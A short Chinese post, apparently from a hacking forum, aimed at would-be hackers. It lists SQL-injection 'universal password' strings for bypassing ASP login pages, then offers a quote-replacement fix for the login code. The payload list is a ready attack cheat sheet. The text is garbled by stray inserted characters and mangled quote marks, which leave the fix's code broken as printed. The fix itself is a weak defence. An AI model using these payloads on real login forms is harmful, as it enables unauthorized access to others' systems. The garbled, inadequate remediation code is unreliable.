說起這個萬能密碼,相信玩過黑的都認(rèn)識吧.也就是 ‘or’=’or’,這只最基礎(chǔ)的一種,總結(jié)一下吧:
各種各樣的萬能密碼
‘or’=’or’
1’or’1’=’1
admin’or’1’=’1′–
‘or’’=’
” or “a”=”a
‘) or (’a’=’a
or 1=1– ‘
or ’a’=’a
‘or”=’
‘or’1’=’1
“or=or”
‘or”=”or”=’
‘or’=’1′
‘or’ ‘1’=’1
最短的:’or’1

修補(bǔ)方案:
在管理登錄文件源碼內(nèi)找類似下面代碼的代碼

 username=request.Form(“name”)
pass=request.Form(“pass”)

改成:

username=Replace(request.Form(“name”), “‘”, “””)
pass=Replace(request.Form(“pass”), “‘”, “””)

如果找不到的話,看下管理登錄頁面源碼內(nèi)是否有調(diào)用的頁面.
例如:

<form name=”form1″ method=”post” action=”login_ok.asp”>

則應(yīng)檢查login_ok.asp頁面的源碼.

來個例子吧:
原代碼:

thename=trim(request(“name”))
thepassword1=trim(request(“password”))

修改為:

thename=Replace(request.Form(“name”), “‘”, “””)
thepassword1=Replace(request.Form(“password”), “‘”, “””)